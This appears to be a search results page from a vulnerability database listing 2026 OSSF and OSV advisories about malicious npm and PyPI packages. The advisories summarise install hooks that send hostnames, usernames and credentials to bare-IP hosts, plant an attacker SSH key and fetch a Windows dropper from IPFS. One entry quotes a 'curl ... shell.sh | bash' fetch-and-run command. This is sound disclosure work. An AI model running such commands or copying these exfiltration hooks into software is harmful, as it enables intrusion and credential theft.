Lucene search
K

32 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago7 views

Malicious code in stella-ai-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 936d3c8bc6611b58f5321ba5aab651bb3d2db821d172816283ca04633be00863 The stella CLI shipped in bin/stella.js prompts users for their phone number and the WhatsApp verification code and POSTs both to a hardcoded bare-IP...

6.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/04 1:43 p.m.11 views

Malicious code in vps-maintenance (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector da5dcc405a10775ace9fab68ee0a5ddf9bcad770d29e20f999df6d41072e46b1 On import of dist/server/index.js, a top-level block spawns a detached shell that 1 appends a hardcoded attacker ssh-ed25519 public key comment eni@l...

6AI score
Exploits0References3
OSV
OSV
added 2026/07/04 1:43 p.m.16 views

MAL-2026-6756 Malicious code in vps-maintenance (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector da5dcc405a10775ace9fab68ee0a5ddf9bcad770d29e20f999df6d41072e46b1 On import of dist/server/index.js, a top-level block spawns a detached shell that 1 appends a hardcoded attacker ssh-ed25519 public key comment eni@l...

6.1AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/29 7:9 a.m.7 views

Malicious code in ledgerflow-deploy-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5f0097d19be676ac30ff79dffcff38f128873c80115a8a150c3eceff0422aa93 On npm install, the package's postinstall script queries the AWS instance metadata service IMDSv1 at 169.254.169.254 for the attached IAM role and...

5.8AI score
Exploits0References4
OSV
OSV
added 2026/06/28 6:1 a.m.7 views

MAL-2026-6557 Malicious code in pkg-fallback (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7f4ccaa9f059318782cd3b811f5bd6ea926e267e4b05dc4971d6acc6687d5d4f setup.py performs an unconditional urllib.request.urlopen at install time to a hardcoded plaintext bare-IP endpoint...

6.2AI score
Exploits0References2
OSV
OSV
added 2026/06/17 6:55 p.m.7 views

MAL-2026-6069 Malicious code in @civitatis/bot-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e51e58cf925eb7dd4e084a2e78e22b0a0db0f1f82663101e34110258839f98f7 The package declares "preinstall": "node index.js" in package.json, causing index.js to execute automatically on npm install. index.js requires...

5.6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 3:10 p.m.20 views

Malicious code in field-plus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0112dc4801bb261e86a2f68d5fd49b6c955bb4e82f872c72e61e49cc638ca91c package.json declares both preinstall and postinstall scripts that run curl against a hardcoded bare-IP HTTP endpoint http://3.7.226.146:9000/callbac...

5.3AI score
Exploits0References2
OSV
OSV
added 2026/06/15 3:9 p.m.10 views

MAL-2026-5782 Malicious code in token-prices-cron (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 10adc862166a2dbaf26f3dc56b4c1dfa0fd45e625f713380564d0b18fb07088d On npm install, the preinstall lifecycle script in postinstall.js enumerates process.env, filters keys matching a broad credential regex...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 3:9 p.m.11 views

Malicious code in vaults-monitor-cron (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b81c6b9e59e86c40858cb47e91d597b3776fea71def7feb3ca11833625fa3923 On npm install, the package's preinstall hook node postinstall.js || true executes automatically. The script collects hostname, username, and current...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/15 3:9 p.m.11 views

MAL-2026-5779 Malicious code in hemi-supply-cron (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c41be27601d38eb5c0b527a9ec22b7516734e8eae985a2607ae6d70878f5f1d9 package.json declares a preinstall hook node postinstall.js that fires automatically on npm install. The script collects host identity os.hostname,...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/12 3:28 p.m.11 views

Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

5.6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 1:23 p.m.15 views

Malicious code in unified-ui-components-library (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8 On npm install, the package's postinstall.js collects os.hostname and os.userInfo.username and embeds them as query-string parameters in a plaintext...

5.6AI score
Exploits0References3
OSV
OSV
added 2026/06/11 1:23 p.m.13 views

MAL-2026-5648 Malicious code in unified-ui-components-library (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8 On npm install, the package's postinstall.js collects os.hostname and os.userInfo.username and embeds them as query-string parameters in a plaintext...

5.6AI score
Exploits0References3
OSV
OSV
added 2026/06/09 5:40 p.m.18 views

MAL-2026-5418 Malicious code in @nstrlabs/api-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de7b47a7f81209dbbaff286599b46f4f030ff992b6d0c25d947cc84739b838d9 @nstrlabs/[email protected] is a hollow package whose only behavior is an install-time exfiltration beacon. package.json declares "preinstall": "node...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 5:16 p.m.15 views

Malicious code in ac_calendar_ts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5b3fd92d67510aef112ac70c9af79a59b924eef29e20b1b127ea4c720182c63 On npm install, the package's canary.js postinstall script issues an HTTP GET to http://157.230.17.236/dc carrying the installer's os.hostname, packa...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 5:16 p.m.13 views

Malicious code in ac_semantic-ui_ts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8b97f7d3e69494d0415e13aec8d9d51ce1f5912d8c1de45a1e563e2d1b01d3d package.json declares a postinstall hook that runs canary.js, which issues an HTTP GET to bare IP 157.230.17.236 on port 80 with query parameters...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 1:28 p.m.12 views

Malicious code in metricflow-tracker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9a1c269ce5e462d7e555ce1ca34b7f2e54e3d34ea094d35a67aa7c61d1fe34e The package's exported Metricflow React component defaults serverUrl to http://51.38.65.105:21531 and, when rendered, appends a tag to document.head ...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 12:0 p.m.12 views

Malicious code in @devcarron/clob (npm)

A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/25 12:0 p.m.16 views

MAL-2026-4347 Malicious code in @devcarron/clob (npm)

A campaign of npm packages sharing a common dropper clob.js that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways Pinata,...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 6:19 p.m.14 views

Malicious code in pewter-constantstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 050b19d8dad7c8c1a626c953493c23b375e434128f38950625f82b0fb244eabe On npm install, the preinstall script callback.js collects the installer's hostname, OS username, current working directory, npm registry...

5.8AI score
Exploits0References1
Rows per page
Query Builder